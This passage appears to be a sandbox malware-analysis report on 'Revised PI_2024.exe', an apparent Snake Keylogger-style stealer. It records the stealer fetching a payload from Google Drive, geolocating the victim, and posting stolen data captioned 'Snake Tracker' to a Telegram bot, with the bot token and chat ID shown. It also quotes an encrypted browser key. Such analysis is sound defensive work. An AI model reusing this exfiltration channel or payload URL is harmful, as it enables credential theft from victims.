Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF15D8h	131_2_33EF11B7
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFE83Fh	131_2_33EFE598
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFE3E7h	131_2_33EFE140
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF15D8h	131_2_33EF1506
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF0BB1h	131_2_33EF0900
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EFDF8Fh	131_2_33EFDCE8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF0751h	131_2_33EF04A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 33EF02F1h	131_2_33EF0040
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360BB043h	131_2_360BAD08
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B99F8h	131_2_360B9750
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B32AFh	131_2_360B3008
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360BA2A7h	131_2_360BA000
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B8CC7h	131_2_360B8A20
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B02E7h	131_2_360B0040
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360BA6FFh	131_2_360BA458
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B1CF7h	131_2_360B1A50
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B3707h	131_2_360B3460
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B911Fh	131_2_360B8E78
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B073Fh	131_2_360B0498
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B7B3Fh	131_2_360B7898
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	131_2_360B5AAB
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B214Fh	131_2_360B1EA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	131_2_360B5AB8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360BAB57h	131_2_360BA8B0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B9577h	131_2_360B92D0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B0B97h	131_2_360B08F0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B25A7h	131_2_360B2300
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B7FBFh	131_2_360B7D18
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B0FEFh	131_2_360B0D48
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B29FFh	131_2_360B2758
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B8417h	131_2_360B8170
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B9E4Fh	131_2_360B9BA8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B1447h	131_2_360B11A0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B2E57h	131_2_360B2BB0
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B886Fh	131_2_360B85C8
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then lea esp, dword ptr [ebp-04h]	131_2_360B5DCE
Source: C:\Users\user\Desktop\Revised PI_2024.exe	Code function: 4x nop then jmp 360B189Fh	131_2_360B15F8

Networking

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: POST /bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419839739&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcaae449bca96bHost: api.telegram.orgContent-Length: 550Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View	ASN Name: TELEGRAMRU TELEGRAMRU
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.11.20:49833 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.11.20:49839 -> 104.21.67.152:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/149.18.24.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 19042.1165)","last_edgeuwp_pin_migration_success":false},"network_primary_browser":{"browser_name_enum":1,"last_computed_time":"13276780388565220","network_usage":{"browser_with_highest_network_usage":1,"browsers_usage":{"1":100.0},"ie":0}},"network_time":{"network_time_mapping":{"local":1.691263997088662e+12,"network":1.691260396e+12,"ticks":126914944.0,"uncertainty":1220870.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDEAAAAAoAAABFAGQAZwBlAAAAEGYAAAABAAAgAAAAcjDYF/dB+Ehkggnbhv5UEmuk4qMrV300v/DxeYPr2kcAAAAADoAAAAACAAAgAAAA4Fc7bPPxg5D3HUrv9FeO3M8NoHE1hRCd1+t1vMyMeGIwAAAA60sl/pIpVYUn/pFhWuHqOweLytcqg8K9+apLINEdcjv+lt8eT+qH7hjP4LZPc65wQAAAABgU4kp6fr9r5p49VZoKZkZbDP1PXsAR/6XYDO+DikEUGEeRYwj0k5LNwmmr0tZ5hKexU3XBg6oVvPcKgnBt6go="},"policy":{"last_statistics_update":"13335737596278882"},"profile":{"info_cache":{"Default":{"active_time":1691263997.009407,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_20",

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

HTTP traffic detected: POST /bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419839739&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcaae449bca96bHost: api.telegram.orgContent-Length: 550Connection: Keep-Alive

Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FD4000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Revised PI_2024.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Revised PI_2024.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FFB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000341C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7403026399:AAFfphUcCNwXUYyJxcHC8R68pFj9jInz4Bk/sendDocument?chat_id=6419
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: Revised PI_2024.exe, 00000083.00000002.86882545175.0000000005260000.00000004.00001000.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sqmW
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/w
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Revised PI_2024.exe, 00000083.00000002.86881921308.00000000036C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1CXoMCBoDVSX6uh45do6ih84N63RLm5sq&export=download
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/i
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340B6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/0
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/lB
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003410B000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86894116757.0000000034FB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: Revised PI_2024.exe, 00000083.00000003.82253848738.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86881921308.000000000374D000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000033FE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.000000003409F000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034024000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034072000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034089000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034094000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.000000003407D000.00000004.00000800.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000002.86892585605.00000000340AA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/149.18.24.104$
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: Revised PI_2024.exe, 00000083.00000002.86892585605.0000000034116000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: Revised PI_2024.exe, 00000083.00000003.82223937920.0000000003752000.00000004.00000020.00020000.00000000.sdmp, Revised PI_2024.exe, 00000083.00000003.82223494824.0000000003752000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49838
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49836
